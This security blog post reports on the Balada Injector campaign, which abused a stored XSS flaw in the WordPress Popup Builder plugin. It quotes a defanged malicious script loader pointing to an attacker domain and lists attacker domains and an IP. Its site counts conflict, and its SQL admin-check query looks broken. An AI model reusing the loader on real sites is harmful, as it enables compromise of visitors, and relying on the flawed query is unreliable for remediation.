SmartWorks Network

  • Home
  • RSS Blog
  • YouTube channels
  • Podcasts
  • Jobs
  • Tools
  • About us
  • Contact

6,200+ WordPress Sites with POPUP BUILDER Plugin Infected by New Balada

by Valentin / Saturday, 13 January 2024 / Published in RSS blog posts

Cyber Security Blogs

Over 6,700 WordPress websites use a vulnerable version of the Popup Builder plugin to build custom popups for marketing, informational, and functional purposes, inadvertently fell victim to the insidious Balada Injector malware.

This coordinated attack, discovered by security researchers at Dr. Web, not only exploited known flaws in WordPress themes and add-ons but also revealed the extensive reach of the Balada Injector operation, which had been compromising WordPress sites since 2017.

Balada Injector Modus Operandi Background and Scope

The Balada Injector campaign gained renown for compromising more than 17,000 WordPress sites, injecting a backdoor that redirected visitors to fake support pages, lottery sites, and push notification scams. Its latest emergence, initiated on December 13, 2023, closely followed the disclosure of a critical vulnerability in the widely used Popup Builder plugin. The vulnerability, a Stored XSS flaw marked as CVE-2023-6000, posed a severe threat to the security of over 200,000 sites using Popup Builder for various purposes.

Domain Analysis

Investigation into the domains used in these attacks revealed a pattern indicating an attempt to mask the source of origin. Cloudflare firewalls were employed to obscure the attackers’ identity. Security researcher Randy McEoin highlighted redirections in the campaign leading to push notification scams.

*SCAM NOTIFICATION (@rmceoin)*

Popup Builder Vulnerability Exploitation

The Balada Injector attackers wasted no time incorporating an exploit for the newly discovered Popup Builder vulnerability. This flaw allowed malicious JavaScript code execution in the site’s database, ultimately compromising the security of the affected websites. Popup Builder version 4.2.3 was swiftly released as a patch, emphasizing the critical need for administrators to update the plugin and secure their sites promptly.

php public static function parsePopupDataFromData($data) { // Code snippet for parsing Popup Builder data // … return $popupData; }

Inconsistencies in Popup Builder Plugin

Meanwhile, Popup Builder plugin analysis also revealed inconsistencies in handling certain POST parameters, leading to logic bugs that could be exploited for Stored XSS attacks.

The plugin’s vulnerability, reported on November 7, 2023, triggered a sequence of events that exposed weaknesses in its structure and handling of user input, ultimately paving the way for the Balada Injector campaign.

All credits go to Marc Montpas for the original research, with the WPScan team providing valuable feedback and assistance throughout.

Balada Injector’s Multi-Stage Attack Initial Script Injection

The Balada Injector campaign leveraged a multi-stage attack strategy, starting with injecting a script into compromised databases. The injected code, obfuscated with random comments, decoded into a script dynamically loading from a newly registered domain specialcraftbox[.]com. This script was a handler for the “sgpbWillOpen ” event in Popup Builder, allowing attackers to control the popup’s behavior.

javascript var d = document; var s = d.createElement(“script”); s.src = ‘hxxps://soft.specialcraftbox[.]com/JZFYbC’; d.getElementsByTagName(‘head’)[0].appendChild(s);

Backdoor Deployment

Beyond script injection, the Balada operators sought to establish a persistent presence by attempting to plant a backdoor on compromised sites. The injected script checked for specific admin-related cookies and, based on the presence or absence of these cookies, loaded subsequent scripts from designated domains.

Fake Wp-Felody Plugin

As part of their arsenal, the Balada attackers employed a fake WordPress plugin named ‘wp-felody.php’ to further exploit compromised sites. This seemingly innocuous plugin, with a deceptive description as “For melody plugin,” harbored sophisticated backdoor functionalities, including arbitrary code execution and communication with the attackers.

php // Code snippet from wp-felody.php function WPD_init() { // Backdoor functionality // … }

*Main Backdoor*

Secondary Infection via wp-blog-header.php

In yet another cunning move, Balada Injector utilized the wp-blog-header.php file to propagate the same JavaScript malware initially injected through the Popup Builder vulnerability.

By modifying this critical file, the attackers ensured a secondary infection layer, adding complexity to their campaign.

php // Code snippet from wp-blog-header.php add_action(‘wp_head’, ‘hook_csssss’);

*Balada injection in wp-blog-header.php (SUCRUI)*

Domain Strategy and Evolving Tactics Balada Domains and Cloudflare

The Balada operators strategically registered domains, such as specialcraftbox[.]com and greenfastline[.]com, on December 13, 2023, for their campaign. Cloudflare initially masked the real IP addresses of these domains, demonstrating a deliberate effort to obfuscate the origins of the attacks.

Redirect URL Patterns

Balada Injector exhibited consistent patterns in its redirect URLs, helping in identifying affected sites and domains. The redirect chain, involving specific subdomains and parameters, was a hallmark of the campaign’s methodology.

plaintext Balada Injector Redirect URL Patterns: – The chain ends with the 0. subdomain of the malicious domain. – URLs contain parameters sub1 and/or sub2 specifying subcampaign names. – Domain names often combine three English words, creating a distinctive pattern.

*URL Pattern*

Domain Registration Timeline

Analyzing the registration dates of domains used in the Balada campaign uncovered a strategic approach to domain management, hinting at an attempt to prolong the efficacy of their attacks.

| Date | Domain | Registrar | |————|————————–|————–| | 2023-12-13 | specialcraftbox[.]com | CloudFlare, later moved to 80.66.79[.]248| | 2023-12-13 | greenfastline[.]com | CloudFlare, later moved to 80.66.79[.]248| | … | … | … |

Infections, Detection, and Mitigation Extent of Infections

Despite the prompt release of Popup Builder version 4.2.3 to fix the vulnerability, the Balada Injector campaign left a significant trail of infections. Over 6,200 websites were detected with the malware, underscoring the rapidity with which attackers identified and exploited vulnerable sites.

wp-felody.php

The persistence of the threat posed by the Balada Injector campaign eventually became evident as the attackers leveraged the wp-felody.php plugin to execute additional malicious code, fetching payloads and maintaining communication with their command and control infrastructure.

Domain Movement and Countermeasures

Cloudflare’s intervention on January 6, 2024, resulted in the blocking of specialcraftbox[.]com, prompting a shift to a Moldovan server. This tactical move highlighted the agility of the attackers in adapting to countermeasures.

Takeaways and Recommendations Importance of Timely Updates

Irrespective of Balada Injector campaign or anything else that might come across, keeping WordPress plugins and themes always remains non negotiable. The Stored XSS vulnerability in Popup Builder, though swiftly addressed, led to thousands of infections due to delays in applying updates.

Vigilance against Malicious Admins and Plugins

Web administrators are urged to monitor for signs of malicious admin users and fake plugins, as infections like Balada Injector often involve the creation of unauthorized admin accounts

sql — SQL query to check for malicious admin users SELECT * FROM wp_users WHERE user_role = ‘admin’;

Cross-Site Contamination Prevention

Preventing cross-site contamination is paramount to halt the spread of malware within a server environment. Regular inspection, cleaning, and isolation of websites under the same server account are crucial measures to curb propagation.

Thorough Backdoor Removal

The urgency of addressing known vulnerabilities promptly is explicitly reflected in the Balada Injector’s case. Despite a swift resolution of the stored XSS vulnerability in Popup Builder, the attackers exploited older versions, impacting over 6,200 websites detected by PublicWWW detects the injection. A thorough cleanup is imperative, involving the removal of injected code from affected files. Employing a file integrity control system and professional malware cleanup services aids in comprehensive remediation.

​Read More

  • Tweet

About Valentin

What you can read next

UAC-0050 Attack Detection: Hackers Are Armed with Remcos RAT, Quasar RAT, and Remote Utilities to Target Ukraine Once Again
Is Surfshark One Worth It? [Honest ANSWER]
Vans, Supreme, North Face Parent Hacked: Data of 35 Million Customer Exposed

Leave a Reply Cancel reply

Your email address will not be published. Required fields are marked *

Recent Posts

  • Sniffnet: Free, open-source network monitoring
  • 90% of threats are social engineering
  • 78% of SMBs fear cyberattacks could shut down their business
  • Chinese attackers leverage previously unseen malware for espionage
  • Long-running Chinese cyberespionage operation targeted Southeast Asian government

Recent Comments

No comments to show.

Recent Posts

  • Sniffnet: Free, open-source network monitoring

    Cyber Security Blogs Sniffnet is a free, open-s...
  • 90% of threats are social engineering

    Cyber Security Blogs In this Help Net Security ...
  • 78% of SMBs fear cyberattacks could shut down their business

    Cyber Security Blogs 94% of SMBs have experienc...
  • Chinese attackers leverage previously unseen malware for espionage

    Cyber Security Blogs Sophos released its report...
  • Long-running Chinese cyberespionage operation targeted Southeast Asian government

    Cyber Security Blogs Researchers have uncovered...

Archives

  • June 2024
  • May 2024
  • March 2024
  • January 2024

Categories

  • RSS blog posts

Meta

  • Log in
  • Entries feed
  • Comments feed
  • WordPress.org

Recent Comments

    Featured Posts

    • Sniffnet: Free, open-source network monitoring

      0 comments
    • 90% of threats are social engineering

      0 comments
    • 78% of SMBs fear cyberattacks could shut down their business

      0 comments
    • Chinese attackers leverage previously unseen malware for espionage

      0 comments
    • Long-running Chinese cyberespionage operation targeted Southeast Asian government

      0 comments

    SEARCH

    RECENT POSTS

    • Sniffnet: Free, open-source network monitoring

    • 90% of threats are social engineering

    • 78% of SMBs fear cyberattacks could shut down their business

    TAG CLOUD

    ©2024 All rights Reserved @Smart Works Network

    TOP